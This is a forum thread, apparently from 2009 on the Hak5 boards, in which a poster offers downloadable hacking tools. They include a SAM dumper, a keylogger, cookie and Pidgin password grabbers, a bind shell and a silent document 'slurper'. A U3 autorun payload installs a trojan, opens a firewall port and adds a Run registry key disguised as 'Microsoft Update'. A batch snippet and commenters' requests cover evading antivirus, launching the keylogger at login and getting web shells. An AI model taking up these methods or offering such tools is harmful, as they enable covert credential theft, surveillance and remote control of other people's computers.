Tools

[DingleBerries]

I felt bad about letting everyone down with my "payload". School had just started and I was extremely overwhelmed... So to make it up here are some in house tools that have never been released. I find them useful and maybe you will to. All tools are 100% legit but I am not going to upload the source, sorry but that's how I roll. All tools were written in C/C++/Python.

Dingles' Berries
tools for fools

DISCLAIMER: MYSELF NOR THE HAK5 CREW ARE RESPONSIBLE FOR HOW YOU USE THESE TOOLS. IF YOU END UP AS BUBBAS BITCH FACE TO FACE WITH THE NSA THEN IT IS YOUR OWN FAULT. THESE TOOLS HAVE NO EVIDENT MALICIOUS PURPOSE AND ONLY YOU CAN CHOOSE HOW TO USE THEM.

IP GETTERER03/03/2009
A command line external IP grabber. No need to visit whatsmyip or ipchicken, now you can run this and find your ip instantly. There is no gui and double clicking just opens a window and closes it. Open CMD and cd to the directory its in and run "ip.exe", it will print your external IP address. To log the ip to a text file just run "ip.exe>ip.txt".

COPY03/03/2009
Windows copy function clone.
DOWNLOAD DOWNLOAD

SAM DUMP03/03/2009
Copies SAM files. Just double click it. You will still have to crack the hash.
DOWNLOAD DOWNLOAD

KEY LOGGER03/03/2009
Simple keylogger. Saves the file to winsysfile.dll, just open it with any plain text editor to read the out put.
DOWNLOAD

COOKIE DUMP03/10/2009
Dumps all user cookies to 'Cookies' folder.
DOWNLOAD DOWNLOAD

PIDGIN PASSWORD GRABBER3/10/2009
Copies users pidigin account passwords stored in accounts.xml.
DOWNLOAD DOWNLOAD

CMD BIND3/10/2009
Binds a CMD prompt to port, l337. Use in conjunction with wget to download and execute programs on a computer. This is an EXTREMELY early alpha version. What I am looking to add is, wget, execute, computer information, ect.
DOWNLOAD DOWNLOAD

SLURPER FINAL04/1/2009
Silent file back up utility. Use to copy '.txt', '.doc'., '.whatever'. Usage, included in the rar is slurp.ini, it is very important you do not change this file name. Open the ini and edit it to suit your needs. Example:
To slurp images and text files we will write:

Extensions = .jpg
Extensions = .txt

The capitilization is important. This will support whatever you throw at it, and should work on any system, no matter the language.



Stay tuned for more applications to come!
Add user
Rick Roller
EXE Binder
Text to MD5
MD5 cracker
MD5 Trip Wire
Hide Task Manager

Have a tool you want made? Interested in something? PM me or request it here! No guarantees, but never hurts to ask.

[DingleBerries]

Browser Tools

Foreword:

Although people love to hate on Microsoft they did manage to get something right, sorta. IE has better local password and user protection. With Google Chrome and Firefox we are able to copy certain key files in to a new profile, or existing, and log in as that user(if there are saved passwords). These tools are ment for backing up your own accounts. Just like the yin and yang all these created for good can be used for evil. Use at your own risk, ect.

Google Chrome

Profile Back Up

03/10/2009

Run the exe, it will create a folder based on what version you downloaded. After the files have copied(under 3 seconds) you can go to a different computer and copy them in the right place and have the same data as the computer you just copied them from.

Windows XP

DOWNLOAD DOWNLOAD

Windows Vista

DOWNLOAD DOWNLOAD

FireFox 3.0.7

How to use these tools:

1. Run the exe.

2. Create a new profile on your machine, not where ever you ran the exe.

3. Exit Firefox and copy files into the new profile, %appdata%\\\*.default.

4. Start Firefox and there you go.

5. You can view stored passwords by going to Edit>Preferences>Security>Saved Passwords

6. If the passwords are protected by a master password I suggest you use FireMaster.

FF Profile Copy03/10/2009

Works when there are multiple profiles installed. Copies complete FireFox Profile.

Windows XP

[G-Stress]

You are the man :D

[DingleBerries]

New Tools added. If you have any problems let me know.

[m1k]

Well done... D B !!!

:)

[Ddes]

Hey, these are great. One specific feature request - I'd love to be able to specify the path of the log file for the keylogger, perhaps with a command-line flag. I'm trying to set it up to run at login, but the file isn't created in the same place as the .exe.

Same for Firefox applications, actually - they don't work from the U3 drive, because even if you put the .exe in the main partition and launch it with a batch script it tries and fails to put the files in the read-only U3 partition. There might be a workaround - some other way of launching the .exe so it got the path correct - but I don't know what it might be.

On the other hand, I may be able to write my own batch script which works for this. I'll get back to this one.

[DingleBerries]

Hey, these are great. One specific feature request - I'd love to be able to specify the path of the log file for the keylogger, perhaps with a command-line flag. I'm trying to set it up to run at login, but the file isn't created in the same place as the .exe.

Same for Firefox applications, actually - they don't work from the U3 drive, because even if you put the .exe in the main partition and launch it with a batch script it tries and fails to put the files in the read-only U3 partition. There might be a workaround - some other way of launching the .exe so it got the path correct - but I don't know what it might be.

On the other hand, I may be able to write my own batch script which works for this. I'll get back to this one.

No need to put it on the U3 partition, just call it from the autorun.ini and it can stay on the flash partition. None of these should be picked up by AntiVirus so there is no need to try and keep it from deleted the file. Ill work on all that later, there are just early betas.

[Ddes]

I created my own version of the Firefox password program. Two main improvements - first, it dumps the files for all the profiles, and second, you can specify where to put the files.

Dingleberries, I haven't looked very hard, but as far as I've seen you can't launch programs from the other partition (without some work - I did actually come up with a solution to that, but I have my own method now and I'm not sure the way I'm thinking of would work in this situation anyway - it might be looking to create the file in the same directory as autorun.ini, which does have to be on the read-only partition). The keylogger does something that - if you create a batch script to launch the exe, the winsysfile.dll is put in the same directory as the batch script regardless of where the exe is.

[DingleBerries]

FF Profile copy works when there are multiple profiles installed.

[Conor_M]

Cool, Nice work, I will deffinetley try these out, I tried out the keylogger and I cannot seem to find winsysfile.dll anywhere, can you enlighten me on where the logger saves it to?

[DingleBerries]

Double click it and start typing. It will create the file in the same directory.

[DingleBerries]

New file just added, Slurper 1.0 NON USB VERSION

[myronhinio]

i cannot make the slurper work!i must be somekind of retard:(>.

i just extraxt the files of the rar in the root of my usb,double click the slurper.and then nothing happens.

[DingleBerries]

You are right... Give me 10 mins to whip up a new one.

UPDATE:

SLURPER V1.1 USB VERSION

[DingleBerries]

Be on the look out for a new payload with some interesting features ;)

[da_manwhich]

hey mate new to all this stuff can you tell me how to stop the keylogger running and keep starting up again

[DingleBerries]

Dingle Berries Load

What you need

A U3 device

Python(for the trojan client)

What it does?

Install a backdoor(Terry the Trojan)

Slurps Documents

Opens Port for trojan

Dumps PC info

Writes a startup to the registry as;

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Microsoft Update >>>>> c:\makPNF.exe

Want to update it? Add some new shit to the end of the .bat file.

DOWNLOAD

Thank You in advance to those who click.

UPDATE

Use this .bat file instead.

[size="1"]for %%i in (B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:\DingleBerries.exe 
 set dir=%%i
 cd /d %dir%:
 DingleBerries.exe[/size]

[timmy]

is it total stealth or will a Av stop it ?

[DingleBerries]

Nothing should be picked up by av, I coded all of it my self, with the exception of the trojan but I have full source for that.

[timmy]

Amazing work but would hope that it would collect more information

[DingleBerries]

Beggars cant be choosers. This is a first release made in less than 5 hours, maybe if we could get some more coders involved then there could be better product, but for now its me.. alone doing the work. All the info given is more then enough. Get wget on the machine and it is completely owned. From there you can download and execute other packages.

And like it says, want to expand? Add more shit to then end of the bat to execute.

[Humper]

Great job here, tobad I can't really help you.

Im only webcoding and designing. If you need something that only

need time to work on I might could help.

Just some questions, do I have to update (flash) my firmware (if so, how)?

and should I put the flash folder in the main usb-drive folder?

Sorry for being such an leecher, but I would help if I could.

Regards Humper

[messsy]

So DingleBerries.exe is the trojan?

[DingleBerries]

Let me explain it a bit more in detail.

There are two folders(CD, Flash). The Flash folder has 2 files(2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan(makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe.

On the flash side, just put all the files on the root of your drive.Dingleberries.exe gabs some info from the pc, writes the computers info to a txt file, rights the registry value to autorun the trojan, and then calls slurp.exe(you can remove slup and replace it with PWDUMP just rename it slurp.exe) Slurp looks in the ini to find out what file types you want slurped up and puts then in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exist it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands.

To use this you will need to make an ISO of the cd folder and flash that to the u3 side.

[0x3]

DB , do u have some coded tools like this works on the webs server ? like IIS6 / etc ... like phpshell on unix* but what am asking for windows ? ( so if you had could u include some code to disable the firewall ) ?

if u need any help in coding using perl ; python ; C/C++ give me a pm please .. i would work with guys who have a mind like you xd

/0x3